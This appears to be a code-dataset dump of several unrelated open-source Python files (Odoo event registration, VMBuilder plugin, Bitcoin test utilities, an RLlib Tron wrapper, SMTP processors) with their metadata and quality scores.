max_stars_repo_path
stringlengths
4
286
max_stars_repo_name
stringlengths
5
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.03M
content_cleaned
stringlengths
6
1.03M
language
stringclasses
111 values
language_score
float64
0.03
1
comments
stringlengths
0
556k
edu_score
float64
0.32
5.03
edu_int_score
int64
0
5
tools/idx/makeIDX.py
vehicle-lang/vehicle
9
6628951
# Small script for generating test IDX dataset files import idx2numpy import numpy as np xs = np.array([0.1,3,-2,-3.2]).astype('float32') f_write = open('datset.idx', 'wb') idx2numpy.convert_to_file(f_write, xs)
# Small script for generating test IDX dataset files import idx2numpy import numpy as np xs = np.array([0.1,3,-2,-3.2]).astype('float32') f_write = open('datset.idx', 'wb') idx2numpy.convert_to_file(f_write, xs)
en
0.486895
# Small script for generating test IDX dataset files
2.552104
3
website_event_attendee_fields/models/event_registration.py
RL-OtherApps/website-addons
0
6628952
# Copyright 2017-2018 <NAME> <https://it-projects.info/team/yelizariev> # License MIT (https://opensource.org/licenses/MIT). import logging from odoo import _, api, models _logger = logging.getLogger(__name__) class EventRegistration(models.Model): _inherit = "event.registration" @api.model def create(self, vals): partner_exists = False if vals.get("email"): Partner = self.env["res.partner"] email = vals.get("email").replace("%", "").replace("_", "\\_") partner_exists = Partner.search([("email", "=ilike", email)], limit=1) res = super(EventRegistration, self).create(vals) if res.attendee_partner_id: # be sure, that name and phone in registration are ones from Attendee, # because built-in modules take them from Partner (buyer) if ones are no presented res.name = res.attendee_partner_id.name res.phone = res.attendee_partner_id.phone if partner_exists: partner_vals = self._prepare_partner(vals) # Update attendee details, if user buys (register) ticket for himself # self.env.user is Administrator here, so just trust to partner_id field if res.attendee_partner_id == res.partner_id: res.attendee_partner_id.sudo().write(partner_vals) elif len(partner_vals) > 1: # If vals has more than email address # Add a note about posible problems with updating fields # FIXME partner_vals always has more than one field (e.g. event_ticket_id, origin, etc). # So, this message is always posted res.message_post( _( "Attendee partner record are not updated for security reasons:<br/> %s " ) % partner_vals ) return res @api.model def _prepare_attendee_values(self, registration): """Extend it to pass partner values too (we remove them later in _prepare_partner) we skip partner_id field to avoid email field overriding. 
""" data = super(EventRegistration, self)._prepare_attendee_values(registration) partner_fields = self.env["res.partner"]._fields data.update( { key: registration[key] for key in registration.keys() if key in partner_fields and key != "partner_id" } ) _logger.debug("_prepare_attendee_values: %s", data) return data def _prepare_partner(self, vals): """method from partner_event module""" event = self.env["event.event"].browse(vals["event_id"]) if not event.attendee_field_ids: # attendee_field_ids is not configure # May happen in tests of other modules, which don't suppose that this module is installed. # Just return super values. return super(EventRegistration, self)._prepare_partner(vals) # copy partner fields to return and removes non-registration fields from vals res = {} partner_fields = self.env["res.partner"]._fields _logger.debug("registration vals before removing: %s", vals) for field in event.attendee_field_ids: fn = field.field_name if field.field_model == "res.partner" or fn in partner_fields: # partner fields value = vals.get(field.field_name) if value: # Don't pass empty value, because it removes previous value. # E.g. when partner with email is specified and known fields are not filled at the form res[fn] = value if fn not in self._fields: # non-registration fields if fn in vals: del vals[fn] _logger.debug("registration vals after removing: %s", vals) _logger.debug("partner values: %s", res) return res
# Copyright 2017-2018 <NAME> <https://it-projects.info/team/yelizariev> # License MIT (https://opensource.org/licenses/MIT). import logging from odoo import _, api, models _logger = logging.getLogger(__name__) class EventRegistration(models.Model): _inherit = "event.registration" @api.model def create(self, vals): partner_exists = False if vals.get("email"): Partner = self.env["res.partner"] email = vals.get("email").replace("%", "").replace("_", "\\_") partner_exists = Partner.search([("email", "=ilike", email)], limit=1) res = super(EventRegistration, self).create(vals) if res.attendee_partner_id: # be sure, that name and phone in registration are ones from Attendee, # because built-in modules take them from Partner (buyer) if ones are no presented res.name = res.attendee_partner_id.name res.phone = res.attendee_partner_id.phone if partner_exists: partner_vals = self._prepare_partner(vals) # Update attendee details, if user buys (register) ticket for himself # self.env.user is Administrator here, so just trust to partner_id field if res.attendee_partner_id == res.partner_id: res.attendee_partner_id.sudo().write(partner_vals) elif len(partner_vals) > 1: # If vals has more than email address # Add a note about posible problems with updating fields # FIXME partner_vals always has more than one field (e.g. event_ticket_id, origin, etc). # So, this message is always posted res.message_post( _( "Attendee partner record are not updated for security reasons:<br/> %s " ) % partner_vals ) return res @api.model def _prepare_attendee_values(self, registration): """Extend it to pass partner values too (we remove them later in _prepare_partner) we skip partner_id field to avoid email field overriding. 
""" data = super(EventRegistration, self)._prepare_attendee_values(registration) partner_fields = self.env["res.partner"]._fields data.update( { key: registration[key] for key in registration.keys() if key in partner_fields and key != "partner_id" } ) _logger.debug("_prepare_attendee_values: %s", data) return data def _prepare_partner(self, vals): """method from partner_event module""" event = self.env["event.event"].browse(vals["event_id"]) if not event.attendee_field_ids: # attendee_field_ids is not configure # May happen in tests of other modules, which don't suppose that this module is installed. # Just return super values. return super(EventRegistration, self)._prepare_partner(vals) # copy partner fields to return and removes non-registration fields from vals res = {} partner_fields = self.env["res.partner"]._fields _logger.debug("registration vals before removing: %s", vals) for field in event.attendee_field_ids: fn = field.field_name if field.field_model == "res.partner" or fn in partner_fields: # partner fields value = vals.get(field.field_name) if value: # Don't pass empty value, because it removes previous value. # E.g. when partner with email is specified and known fields are not filled at the form res[fn] = value if fn not in self._fields: # non-registration fields if fn in vals: del vals[fn] _logger.debug("registration vals after removing: %s", vals) _logger.debug("partner values: %s", res) return res
en
0.863288
# Copyright 2017-2018 <NAME> <https://it-projects.info/team/yelizariev> # License MIT (https://opensource.org/licenses/MIT). # be sure, that name and phone in registration are ones from Attendee, # because built-in modules take them from Partner (buyer) if ones are no presented # Update attendee details, if user buys (register) ticket for himself # self.env.user is Administrator here, so just trust to partner_id field # If vals has more than email address # Add a note about posible problems with updating fields # FIXME partner_vals always has more than one field (e.g. event_ticket_id, origin, etc). # So, this message is always posted Extend it to pass partner values too (we remove them later in _prepare_partner) we skip partner_id field to avoid email field overriding. method from partner_event module # attendee_field_ids is not configure # May happen in tests of other modules, which don't suppose that this module is installed. # Just return super values. # copy partner fields to return and removes non-registration fields from vals # partner fields # Don't pass empty value, because it removes previous value. # E.g. when partner with email is specified and known fields are not filled at the form # non-registration fields
2.180532
2
src/vm-builder-0.12.4+bzr489/build/lib.linux-x86_64-2.7/VMBuilder/plugins/ubuntu/lucid.py
cryptorinium/Num2
0
6628953
<gh_stars>0 # # Uncomplicated VM Builder # Copyright (C) 2010 Canonical Ltd. # # See AUTHORS for list of contributors # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3, as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import os from VMBuilder.util import run_cmd from VMBuilder.plugins.ubuntu.karmic import Karmic class Lucid(Karmic): valid_flavours = { 'i386' : ['386', 'generic', 'generic-pae', 'virtual'], 'amd64' : ['generic', 'preempt', 'server', 'virtual'] } def divert_file(self, path, add): if add: action = "--add" else: action = "--remove" if not add: os.remove('%s/%s' % (self.context.chroot_dir, path)) run_cmd('chroot', self.context.chroot_dir, 'dpkg-divert', '--local', '--rename', action, path)
# # Uncomplicated VM Builder # Copyright (C) 2010 Canonical Ltd. # # See AUTHORS for list of contributors # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3, as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import os from VMBuilder.util import run_cmd from VMBuilder.plugins.ubuntu.karmic import Karmic class Lucid(Karmic): valid_flavours = { 'i386' : ['386', 'generic', 'generic-pae', 'virtual'], 'amd64' : ['generic', 'preempt', 'server', 'virtual'] } def divert_file(self, path, add): if add: action = "--add" else: action = "--remove" if not add: os.remove('%s/%s' % (self.context.chroot_dir, path)) run_cmd('chroot', self.context.chroot_dir, 'dpkg-divert', '--local', '--rename', action, path)
en
0.864228
# # Uncomplicated VM Builder # Copyright (C) 2010 Canonical Ltd. # # See AUTHORS for list of contributors # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3, as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. #
1.824994
2
test/functional/test_framework/blocktools.py
hackverket/bitcoin-abc
0
6628954
#!/usr/bin/env python3 # Copyright (c) 2015-2016 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Utilities for manipulating blocks and transactions.""" from .mininode import * from .script import CScript, OP_TRUE, OP_CHECKSIG, OP_RETURN, OP_PUSHDATA2, OP_DUP, OP_HASH160, OP_EQUALVERIFY from .mininode import CTransaction, CTxOut, CTxIn from .util import satoshi_round from .txtools import pad_tx # Create a block (with regtest difficulty) def create_block(hashprev, coinbase, nTime=None): block = CBlock() if nTime is None: import time block.nTime = int(time.time() + 600) else: block.nTime = nTime block.hashPrevBlock = hashprev block.nBits = 0x207fffff # Will break after a difficulty adjustment... block.vtx.append(coinbase) block.hashMerkleRoot = block.calc_merkle_root() block.calc_sha256() return block def serialize_script_num(value): r = bytearray(0) if value == 0: return r neg = value < 0 absvalue = -value if neg else value while (absvalue): r.append(int(absvalue & 0xff)) absvalue >>= 8 if r[-1] & 0x80: r.append(0x80 if neg else 0) elif neg: r[-1] |= 0x80 return r # Create a coinbase transaction, assuming no miner fees. # If pubkey is passed in, the coinbase output will be a P2PK output; # otherwise an anyone-can-spend output. def create_coinbase(height, pubkey=None): coinbase = CTransaction() coinbase.vin.append(CTxIn(COutPoint(0, 0xffffffff), ser_string(serialize_script_num(height)), 0xffffffff)) coinbaseoutput = CTxOut() coinbaseoutput.nValue = 50 * COIN halvings = int(height / 150) # regtest coinbaseoutput.nValue >>= halvings if (pubkey != None): coinbaseoutput.scriptPubKey = CScript([pubkey, OP_CHECKSIG]) else: coinbaseoutput.scriptPubKey = CScript([OP_TRUE]) coinbase.vout = [coinbaseoutput] # Make sure the coinbase is at least 100 bytes pad_tx(coinbase) coinbase.calc_sha256() return coinbase # Create a transaction. 
# If the scriptPubKey is not specified, make it anyone-can-spend. def create_transaction(prevtx, n, sig, value, scriptPubKey=CScript()): tx = CTransaction() assert(n < len(prevtx.vout)) tx.vin.append(CTxIn(COutPoint(prevtx.sha256, n), sig, 0xffffffff)) tx.vout.append(CTxOut(value, scriptPubKey)) pad_tx(tx) tx.calc_sha256() return tx def get_legacy_sigopcount_block(block, fAccurate=True): count = 0 for tx in block.vtx: count += get_legacy_sigopcount_tx(tx, fAccurate) return count def get_legacy_sigopcount_tx(tx, fAccurate=True): count = 0 for i in tx.vout: count += i.scriptPubKey.GetSigOpCount(fAccurate) for j in tx.vin: # scriptSig might be of type bytes, so convert to CScript for the moment count += CScript(j.scriptSig).GetSigOpCount(fAccurate) return count def create_confirmed_utxos(node, count, age=101): """ Helper to create at least "count" utxos """ to_generate = int(0.5 * count) + age while to_generate > 0: node.generate(min(25, to_generate)) to_generate -= 25 utxos = node.listunspent() iterations = count - len(utxos) addr1 = node.getnewaddress() addr2 = node.getnewaddress() if iterations <= 0: return utxos for i in range(iterations): t = utxos.pop() inputs = [] inputs.append({"txid": t["txid"], "vout": t["vout"]}) outputs = {} outputs[addr1] = satoshi_round(t['amount'] / 2) outputs[addr2] = satoshi_round(t['amount'] / 2) raw_tx = node.createrawtransaction(inputs, outputs) ctx = FromHex(CTransaction(), raw_tx) fee = node.calculate_fee(ctx) // 2 ctx.vout[0].nValue -= fee # Due to possible truncation, we go ahead and take another satoshi in # fees to ensure the transaction gets through ctx.vout[1].nValue -= fee + 1 signed_tx = node.signrawtransaction(ToHex(ctx))["hex"] node.sendrawtransaction(signed_tx) while (node.getmempoolinfo()['size'] > 0): node.generate(1) utxos = node.listunspent() assert(len(utxos) >= count) return utxos def mine_big_block(node, utxos=None): # generate a 66k transaction, # and 14 of them is close to the 1MB block limit num = 14 utxos = 
utxos if utxos is not None else [] if len(utxos) < num: utxos.clear() utxos.extend(node.listunspent()) send_big_transactions(node, utxos, num, 100) node.generate(1) def send_big_transactions(node, utxos, num, fee_multiplier): from .cashaddr import decode txids = [] padding = "1"*(512*127) addrHash = decode(node.getnewaddress())[2] for _ in range(num): ctx = CTransaction() utxo = utxos.pop() txid = int(utxo['txid'], 16) ctx.vin.append(CTxIn(COutPoint(txid, int(utxo["vout"])), b"")) ctx.vout.append(CTxOut(0, CScript( [OP_RETURN, OP_PUSHDATA2, len(padding), bytes(padding, 'utf-8')]))) ctx.vout.append( CTxOut(int(satoshi_round(utxo['amount']*COIN)), CScript([OP_DUP, OP_HASH160, addrHash, OP_EQUALVERIFY, OP_CHECKSIG]))) # Create a proper fee for the transaction to be mined ctx.vout[1].nValue -= int(fee_multiplier * node.calculate_fee(ctx)) signresult = node.signrawtransaction( ToHex(ctx), None, None, "NONE|FORKID") txid = node.sendrawtransaction(signresult["hex"], True) txids.append(txid) return txids
#!/usr/bin/env python3 # Copyright (c) 2015-2016 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Utilities for manipulating blocks and transactions.""" from .mininode import * from .script import CScript, OP_TRUE, OP_CHECKSIG, OP_RETURN, OP_PUSHDATA2, OP_DUP, OP_HASH160, OP_EQUALVERIFY from .mininode import CTransaction, CTxOut, CTxIn from .util import satoshi_round from .txtools import pad_tx # Create a block (with regtest difficulty) def create_block(hashprev, coinbase, nTime=None): block = CBlock() if nTime is None: import time block.nTime = int(time.time() + 600) else: block.nTime = nTime block.hashPrevBlock = hashprev block.nBits = 0x207fffff # Will break after a difficulty adjustment... block.vtx.append(coinbase) block.hashMerkleRoot = block.calc_merkle_root() block.calc_sha256() return block def serialize_script_num(value): r = bytearray(0) if value == 0: return r neg = value < 0 absvalue = -value if neg else value while (absvalue): r.append(int(absvalue & 0xff)) absvalue >>= 8 if r[-1] & 0x80: r.append(0x80 if neg else 0) elif neg: r[-1] |= 0x80 return r # Create a coinbase transaction, assuming no miner fees. # If pubkey is passed in, the coinbase output will be a P2PK output; # otherwise an anyone-can-spend output. def create_coinbase(height, pubkey=None): coinbase = CTransaction() coinbase.vin.append(CTxIn(COutPoint(0, 0xffffffff), ser_string(serialize_script_num(height)), 0xffffffff)) coinbaseoutput = CTxOut() coinbaseoutput.nValue = 50 * COIN halvings = int(height / 150) # regtest coinbaseoutput.nValue >>= halvings if (pubkey != None): coinbaseoutput.scriptPubKey = CScript([pubkey, OP_CHECKSIG]) else: coinbaseoutput.scriptPubKey = CScript([OP_TRUE]) coinbase.vout = [coinbaseoutput] # Make sure the coinbase is at least 100 bytes pad_tx(coinbase) coinbase.calc_sha256() return coinbase # Create a transaction. 
# If the scriptPubKey is not specified, make it anyone-can-spend. def create_transaction(prevtx, n, sig, value, scriptPubKey=CScript()): tx = CTransaction() assert(n < len(prevtx.vout)) tx.vin.append(CTxIn(COutPoint(prevtx.sha256, n), sig, 0xffffffff)) tx.vout.append(CTxOut(value, scriptPubKey)) pad_tx(tx) tx.calc_sha256() return tx def get_legacy_sigopcount_block(block, fAccurate=True): count = 0 for tx in block.vtx: count += get_legacy_sigopcount_tx(tx, fAccurate) return count def get_legacy_sigopcount_tx(tx, fAccurate=True): count = 0 for i in tx.vout: count += i.scriptPubKey.GetSigOpCount(fAccurate) for j in tx.vin: # scriptSig might be of type bytes, so convert to CScript for the moment count += CScript(j.scriptSig).GetSigOpCount(fAccurate) return count def create_confirmed_utxos(node, count, age=101): """ Helper to create at least "count" utxos """ to_generate = int(0.5 * count) + age while to_generate > 0: node.generate(min(25, to_generate)) to_generate -= 25 utxos = node.listunspent() iterations = count - len(utxos) addr1 = node.getnewaddress() addr2 = node.getnewaddress() if iterations <= 0: return utxos for i in range(iterations): t = utxos.pop() inputs = [] inputs.append({"txid": t["txid"], "vout": t["vout"]}) outputs = {} outputs[addr1] = satoshi_round(t['amount'] / 2) outputs[addr2] = satoshi_round(t['amount'] / 2) raw_tx = node.createrawtransaction(inputs, outputs) ctx = FromHex(CTransaction(), raw_tx) fee = node.calculate_fee(ctx) // 2 ctx.vout[0].nValue -= fee # Due to possible truncation, we go ahead and take another satoshi in # fees to ensure the transaction gets through ctx.vout[1].nValue -= fee + 1 signed_tx = node.signrawtransaction(ToHex(ctx))["hex"] node.sendrawtransaction(signed_tx) while (node.getmempoolinfo()['size'] > 0): node.generate(1) utxos = node.listunspent() assert(len(utxos) >= count) return utxos def mine_big_block(node, utxos=None): # generate a 66k transaction, # and 14 of them is close to the 1MB block limit num = 14 utxos = 
utxos if utxos is not None else [] if len(utxos) < num: utxos.clear() utxos.extend(node.listunspent()) send_big_transactions(node, utxos, num, 100) node.generate(1) def send_big_transactions(node, utxos, num, fee_multiplier): from .cashaddr import decode txids = [] padding = "1"*(512*127) addrHash = decode(node.getnewaddress())[2] for _ in range(num): ctx = CTransaction() utxo = utxos.pop() txid = int(utxo['txid'], 16) ctx.vin.append(CTxIn(COutPoint(txid, int(utxo["vout"])), b"")) ctx.vout.append(CTxOut(0, CScript( [OP_RETURN, OP_PUSHDATA2, len(padding), bytes(padding, 'utf-8')]))) ctx.vout.append( CTxOut(int(satoshi_round(utxo['amount']*COIN)), CScript([OP_DUP, OP_HASH160, addrHash, OP_EQUALVERIFY, OP_CHECKSIG]))) # Create a proper fee for the transaction to be mined ctx.vout[1].nValue -= int(fee_multiplier * node.calculate_fee(ctx)) signresult = node.signrawtransaction( ToHex(ctx), None, None, "NONE|FORKID") txid = node.sendrawtransaction(signresult["hex"], True) txids.append(txid) return txids
en
0.784314
#!/usr/bin/env python3 # Copyright (c) 2015-2016 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. Utilities for manipulating blocks and transactions. # Create a block (with regtest difficulty) # Will break after a difficulty adjustment... # Create a coinbase transaction, assuming no miner fees. # If pubkey is passed in, the coinbase output will be a P2PK output; # otherwise an anyone-can-spend output. # regtest # Make sure the coinbase is at least 100 bytes # Create a transaction. # If the scriptPubKey is not specified, make it anyone-can-spend. # scriptSig might be of type bytes, so convert to CScript for the moment Helper to create at least "count" utxos # Due to possible truncation, we go ahead and take another satoshi in # fees to ensure the transaction gets through # generate a 66k transaction, # and 14 of them is close to the 1MB block limit # Create a proper fee for the transaction to be mined
2.225386
2
colosseumrl/envs/tron/TronRllibEnvironment.py
carletonz/colosseumrl
8
6628955
import numpy as np from gym.spaces import Dict, Discrete, Box, Space from colosseumrl import BaseEnvironment from colosseumrl.envs.wrappers import RllibWrapper from . import TronGridEnvironment class TronRllibEnvironment(RllibWrapper): def create_env(self, *args, **kwargs) -> BaseEnvironment: return TronGridEnvironment.create(*args, **kwargs) def create_observation_space(self, *args, **kwargs) -> Space: num_players = self.env.num_players board_size = self.env.N return Dict({ 'board': Box(0, num_players, shape=(board_size, board_size)), 'heads': Box(0, np.infty, shape=(num_players,)), 'directions': Box(0, 4, shape=(num_players,)), 'deaths': Box(0, num_players, shape=(num_players,)) }) def create_action_space(self, *args, **kwargs) -> Space: return Discrete(3) def create_done_dict(self, state, players, rewards, terminal, action_dict): alive_players = set(map(str, players)) return {player: ((player not in alive_players) or terminal) for player in action_dict} def action_map(self, action): if action == 0: return 'forward' elif action == 1: return 'right' else: return 'left'
import numpy as np from gym.spaces import Dict, Discrete, Box, Space from colosseumrl import BaseEnvironment from colosseumrl.envs.wrappers import RllibWrapper from . import TronGridEnvironment class TronRllibEnvironment(RllibWrapper): def create_env(self, *args, **kwargs) -> BaseEnvironment: return TronGridEnvironment.create(*args, **kwargs) def create_observation_space(self, *args, **kwargs) -> Space: num_players = self.env.num_players board_size = self.env.N return Dict({ 'board': Box(0, num_players, shape=(board_size, board_size)), 'heads': Box(0, np.infty, shape=(num_players,)), 'directions': Box(0, 4, shape=(num_players,)), 'deaths': Box(0, num_players, shape=(num_players,)) }) def create_action_space(self, *args, **kwargs) -> Space: return Discrete(3) def create_done_dict(self, state, players, rewards, terminal, action_dict): alive_players = set(map(str, players)) return {player: ((player not in alive_players) or terminal) for player in action_dict} def action_map(self, action): if action == 0: return 'forward' elif action == 1: return 'right' else: return 'left'
none
1
2.637597
3
piped/processors/smtp_processors.py
alexbrasetvik/Piped
3
6628956
<filename>piped/processors/smtp_processors.py # Copyright (c) 2010-2011, Found IT A/S and Piped Project Contributors. # See LICENSE for details. from email import message from zope import interface from twisted.internet import defer from piped import util, processing, exceptions from piped.processors import base from piped.providers import smtp_provider class CreateEmailMessage(base.Processor): """ Creates an instance of :class:`email.message.Message`. """ interface.classProvides(processing.IProcessor) name = 'create-email-message' def __init__(self, output_path='message', payload_path=None, headers=None, **kw): """ :param output_path: The path in the baton where the :class:`email.message.Message` should be stored. :param payload_path: The path to the payload in the baton. :param headers: A dict of initial headers to set in the email message. Example: .. code-block:: yaml - create-email-message: ... headers: Subject: my-subject From: Sender Name <<EMAIL>> To: Recipient Name <<EMAIL>> """ super(CreateEmailMessage, self).__init__(**kw) self.output_path = output_path self.payload_path = payload_path self.headers = headers or dict() def process(self, baton): msg = message.Message() for key, value in self.headers.items(): msg.add_header(key, value) if self.payload_path: payload = util.dict_get_path(baton, self.payload_path) if hasattr(payload, 'read'): payload = payload.read() msg.set_payload(payload) if self.output_path == '': return msg util.dict_set_path(baton, self.output_path, msg) return baton class SetMessageHeaders(base.Processor): """ Set or replace message headers of an :class:`email.message.Message`. If the header already exists in the message, it will be replaced, otherwise it will be added. """ interface.classProvides(processing.IProcessor) name = 'replace-email-headers' def __init__(self, headers, message_path='message', **kw): """ :param message_path: The path to the :class:`email.message.Message` in the baton. 
:param headers: A :class:`dict` of headers and their values which should be set """ super(SetMessageHeaders, self).__init__(**kw) self.message_path = message_path self.headers = headers def process(self, baton): message = util.dict_get_path(baton, self.message_path) for key, value in self.headers.items(): if key in message: message.replace_header(key, value) else: message.add_header(key, value) return baton class SendEmail(base.Processor): """ Send an email. """ interface.classProvides(processing.IProcessor) name = 'send-email' def __init__(self, message_path='message', configuration=None, **kw): """ :param message_path: The path to the message in the baton. :param from: The email address of the sender. :param from_path: The path to the senders email address in the baton. Only one of ``from`` and ``from_path`` may be used. :param to: The email address of the recipient. :param to_path: The path to the recipients email address in the baton. Only one of ``to`` and ``to_path`` may be used. :param configuration: The configuration argument may contain arguments accepted by :meth:`~piped.providers.smtp_provider.send_mail`, except ``from_addr``, ``to_addr`` and ``file`` which is provided by this processor: .. automethod:: piped.providers.smtp_provider.send_mail :noindex: """ self.from_addr = kw.pop('from', None) self.from_path = kw.pop('from_path', None) self.to_addr = kw.pop('to', None) self.to_path = kw.pop('to_path', None) self._fail_if_from_to_not_properly_configured() super(SendEmail, self).__init__(**kw) self.message_path = message_path self.configuration = configuration or dict() def _fail_if_from_to_not_properly_configured(self): if (self.from_addr and self.from_path) or not (self.from_addr or self.from_path): e_msg = 'Invalid "from"-configuration.' detail = 'Either "from" or "from_path" must be used.' raise exceptions.ConfigurationError(e_msg, detail) if (self.to_addr and self.to_path) or not (self.to_addr or self.to_path): e_msg = 'Invalid "to"-configuration.' 
detail = 'Either "to" or "to_path" must be used.' raise exceptions.ConfigurationError(e_msg, detail) @defer.inlineCallbacks def process(self, baton): message = util.dict_get_path(baton, self.message_path) from_addr = self.from_addr if not from_addr: from_addr = util.dict_get_path(baton, self.from_path) to_addr = self.to_addr if not to_addr: to_addr = util.dict_get_path(baton, self.to_path) yield smtp_provider.send_mail(from_addr, to_addr, message, **self.configuration) defer.returnValue(baton)
<filename>piped/processors/smtp_processors.py # Copyright (c) 2010-2011, Found IT A/S and Piped Project Contributors. # See LICENSE for details. from email import message from zope import interface from twisted.internet import defer from piped import util, processing, exceptions from piped.processors import base from piped.providers import smtp_provider class CreateEmailMessage(base.Processor): """ Creates an instance of :class:`email.message.Message`. """ interface.classProvides(processing.IProcessor) name = 'create-email-message' def __init__(self, output_path='message', payload_path=None, headers=None, **kw): """ :param output_path: The path in the baton where the :class:`email.message.Message` should be stored. :param payload_path: The path to the payload in the baton. :param headers: A dict of initial headers to set in the email message. Example: .. code-block:: yaml - create-email-message: ... headers: Subject: my-subject From: Sender Name <<EMAIL>> To: Recipient Name <<EMAIL>> """ super(CreateEmailMessage, self).__init__(**kw) self.output_path = output_path self.payload_path = payload_path self.headers = headers or dict() def process(self, baton): msg = message.Message() for key, value in self.headers.items(): msg.add_header(key, value) if self.payload_path: payload = util.dict_get_path(baton, self.payload_path) if hasattr(payload, 'read'): payload = payload.read() msg.set_payload(payload) if self.output_path == '': return msg util.dict_set_path(baton, self.output_path, msg) return baton class SetMessageHeaders(base.Processor): """ Set or replace message headers of an :class:`email.message.Message`. If the header already exists in the message, it will be replaced, otherwise it will be added. """ interface.classProvides(processing.IProcessor) name = 'replace-email-headers' def __init__(self, headers, message_path='message', **kw): """ :param message_path: The path to the :class:`email.message.Message` in the baton. 
:param headers: A :class:`dict` of headers and their values which should be set """ super(SetMessageHeaders, self).__init__(**kw) self.message_path = message_path self.headers = headers def process(self, baton): message = util.dict_get_path(baton, self.message_path) for key, value in self.headers.items(): if key in message: message.replace_header(key, value) else: message.add_header(key, value) return baton class SendEmail(base.Processor): """ Send an email. """ interface.classProvides(processing.IProcessor) name = 'send-email' def __init__(self, message_path='message', configuration=None, **kw): """ :param message_path: The path to the message in the baton. :param from: The email address of the sender. :param from_path: The path to the senders email address in the baton. Only one of ``from`` and ``from_path`` may be used. :param to: The email address of the recipient. :param to_path: The path to the recipients email address in the baton. Only one of ``to`` and ``to_path`` may be used. :param configuration: The configuration argument may contain arguments accepted by :meth:`~piped.providers.smtp_provider.send_mail`, except ``from_addr``, ``to_addr`` and ``file`` which is provided by this processor: .. automethod:: piped.providers.smtp_provider.send_mail :noindex: """ self.from_addr = kw.pop('from', None) self.from_path = kw.pop('from_path', None) self.to_addr = kw.pop('to', None) self.to_path = kw.pop('to_path', None) self._fail_if_from_to_not_properly_configured() super(SendEmail, self).__init__(**kw) self.message_path = message_path self.configuration = configuration or dict() def _fail_if_from_to_not_properly_configured(self): if (self.from_addr and self.from_path) or not (self.from_addr or self.from_path): e_msg = 'Invalid "from"-configuration.' detail = 'Either "from" or "from_path" must be used.' raise exceptions.ConfigurationError(e_msg, detail) if (self.to_addr and self.to_path) or not (self.to_addr or self.to_path): e_msg = 'Invalid "to"-configuration.' 
detail = 'Either "to" or "to_path" must be used.' raise exceptions.ConfigurationError(e_msg, detail) @defer.inlineCallbacks def process(self, baton): message = util.dict_get_path(baton, self.message_path) from_addr = self.from_addr if not from_addr: from_addr = util.dict_get_path(baton, self.from_path) to_addr = self.to_addr if not to_addr: to_addr = util.dict_get_path(baton, self.to_path) yield smtp_provider.send_mail(from_addr, to_addr, message, **self.configuration) defer.returnValue(baton)
en
0.671739
# Copyright (c) 2010-2011, Found IT A/S and Piped Project Contributors. # See LICENSE for details. Creates an instance of :class:`email.message.Message`. :param output_path: The path in the baton where the :class:`email.message.Message` should be stored. :param payload_path: The path to the payload in the baton. :param headers: A dict of initial headers to set in the email message. Example: .. code-block:: yaml - create-email-message: ... headers: Subject: my-subject From: Sender Name <<EMAIL>> To: Recipient Name <<EMAIL>> Set or replace message headers of an :class:`email.message.Message`. If the header already exists in the message, it will be replaced, otherwise it will be added. :param message_path: The path to the :class:`email.message.Message` in the baton. :param headers: A :class:`dict` of headers and their values which should be set Send an email. :param message_path: The path to the message in the baton. :param from: The email address of the sender. :param from_path: The path to the senders email address in the baton. Only one of ``from`` and ``from_path`` may be used. :param to: The email address of the recipient. :param to_path: The path to the recipients email address in the baton. Only one of ``to`` and ``to_path`` may be used. :param configuration: The configuration argument may contain arguments accepted by :meth:`~piped.providers.smtp_provider.send_mail`, except ``from_addr``, ``to_addr`` and ``file`` which is provided by this processor: .. automethod:: piped.providers.smtp_provider.send_mail :noindex:
2.485154
2
.config/qtile/config.py
garywei944/eva_ubuntu
0
6628957
<filename>.config/qtile/config.py # Copyright (c) 2010 <NAME> # Copyright (c) 2010, 2014 dequis # Copyright (c) 2012 <NAME> # Copyright (c) 2012-2014 <NAME> # Copyright (c) 2012 <NAME> # Copyright (c) 2013 horsik # Copyright (c) 2013 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
